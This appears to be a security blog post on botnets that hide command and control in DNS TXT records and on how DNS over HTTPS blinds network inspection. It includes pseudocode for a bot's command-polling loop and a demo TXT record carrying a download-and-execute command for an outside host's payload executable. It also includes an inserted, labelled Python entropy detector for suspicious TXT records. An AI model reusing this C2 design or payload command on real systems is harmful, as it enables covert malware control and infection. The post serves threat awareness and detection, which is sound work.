Stealthy Botnets using DNS TXT Records & DNS over HTTPS (DoH) adoption Implications
Introduction
Stealthy botnets use DNS TXT records as a Command and Control (CNC) mechanism. Consider the millions of DNS requests your organization generates in a single day, or even an hour. Because of the effort required to inspect and process that volume of DNS traffic, botnets using TXT records for CNC can remain undetected for extended periods of time.
DNS over HTTPS (DoH) is a new way to perform DNS lookups that has already been adopted by Firefox and is expected to be used by other browsers in the near future. In theory, DoH will increase privacy because Internet Service Providers (ISPs) (or similar entities) can't snoop on your browsing history by examining DNS traffic.
What impact will DNS over HTTPS have on Botnets hiding CNC communications in DNS TXT records? Let's find out.
*spoiler alert, it's not good*
In the Wild
- https://www.zdnet.com/article/first-ever-malware-strain-spotted-abusing-new-doh-dns-over-https-protocol/
- https://www.bleepingcomputer.com/news/security/new-spam-campaign-controlled-by-attackers-via-dns-txt-records/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/necurs-spam-uses-dns-txt-records-for-redirection/
Pseudocode
A main loop for a bot using DNS TXT as a CNC mechanism could be as follows:
while (1) {
    // Query the CNC TXT record; returns NULL if the record is absent or the lookup fails
    DNSRet = GetDnsTxtData("txt.malware.com");
    if (DNSRet) {
        // Decode/decrypt the record content before parsing it
        lstrcpy(Data, EnDecrypt(DNSRet));
        ParseCommands(Data);
    }
    Sleep(%m);  // poll interval between lookups
}
In this case, the ParseCommands function can spawn threads for processing commands.
The Real Deal
Based on the pseudocode a small project was created in Visual Studio demonstrating the use of DNS TXT as a CNC.
Demo
For the demo, we configure a text record with the download and execute command.
TXT record content (plaintext): 1 http://d.cyberarmor.pro/.d/payload1.exe|
Over the Wire
A pcap of the traffic captured with Wireshark during the demo is available. Examining the pcap, we can identify the DNS record name used for CNC and view the content of the record as it was transmitted over the wire.
Discussion
Threat actors have used this method in the past and will continue to do so in the future. The good news is that botnet operators aren't going to leave critical parts of their infrastructure exposed in a public DNS TXT record. Encoded, obfuscated or encrypted records stand out when compared to benign records because they have a higher byte entropy. Searching for high-entropy content in DNS TXT record responses could be used to detect, or at the very least flag, TXT records with suspicious content.
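The entropy heuristic described above, as an added example that is not part of the original post: it scores the byte entropy of each TXT response and skips record formats that are well known or legitimately high-entropy (DKIM public keys are base64), so those do not become false positives. The sample records (apart from the demo record shown earlier), the prefix allowlist and the 4.8 bits/byte threshold are constructed assumptions for illustration.

```python
import math
from collections import Counter

# Constructed allowlist of well-known TXT formats. DKIM records carry a base64
# public key and would otherwise trip a naive entropy threshold.
KNOWN_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1", "google-site-verification=", "MS=")

# Bits per byte. Random base64 tends towards 6.0, hex towards 4.0, English-like
# text around 4.0-4.5. Constructed value; tune it against your own baseline.
HIGH_ENTROPY_THRESHOLD = 4.8

# Constructed sample responses as (record name, rdata bytes).
SAMPLE_RECORDS = [
    ("example.com", b"v=spf1 include:_spf.example.net -all"),
    ("s1._domainkey.example.com", b"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"),
    # The plaintext demo record from the post: readable, but low entropy.
    ("txt.malware.com", b"1 http://d.cyberarmor.pro/.d/payload1.exe|"),
    # Constructed stand-in for an encrypted/base64 CNC record (48 distinct symbols).
    ("txt.malware.com", b"Qx7Pz2mK9vL4bN8cR1tY6wE3uI5oA0sDfGhJ+/ZgjHkVWnqM"),
]


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_txt_records(records, threshold=HIGH_ENTROPY_THRESHOLD):
    """Classify each (name, rdata) pair as known-format, flag-high-entropy or low-entropy."""
    results = []
    for name, rdata in records:
        entropy = shannon_entropy(rdata)
        text = rdata.decode("latin-1")  # never fails; TXT rdata is arbitrary bytes
        if text.startswith(KNOWN_PREFIXES):
            verdict = "known-format"
        elif entropy >= threshold:
            verdict = "flag-high-entropy"
        else:
            verdict = "low-entropy"
        results.append({"name": name, "entropy": round(entropy, 2), "verdict": verdict})
    return results


if __name__ == "__main__":
    for r in scan_txt_records(SAMPLE_RECORDS):
        print(f"{r['verdict']:18} {r['entropy']:5.2f}  {r['name']}")
```

The scan only works on TXT responses you can actually observe, for example at the organization's own resolver; the plaintext demo record passes the entropy check, which is why the post pairs this heuristic with the expectation that real operators encrypt their records.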
Problem
Due to the expected adoption of DoH, it will be easier for botnets hiding their CNC communications in DNS TXT records to blend in with requests generated by the user's browser. Passive inspection will no longer be an option. Why? A bot can use the same DoH server as the user's browser, or one from a list of the most popular DoH resolvers, so the lookup hides among browser traffic and neither the query name nor the response is visible over the wire.
DoH Request
Using a standalone DoH client, we request the same TXT record the bot uses as a CNC.
A quick glance at the pcap shows the expected TLS handshake followed by encrypted application data. This is the normal behavior for a DNS request resolved over DoH.
After examining the pcap, we are unable to locate the requested CNC record name or the content of the response transmitted over the wire because it was encrypted by DoH. Uh-oh!
Github (for DoH Client): https://github.com/curl/doh
Solution
Let’s brainstorm. Grab a spot on my calendar and bring your whiteboard :)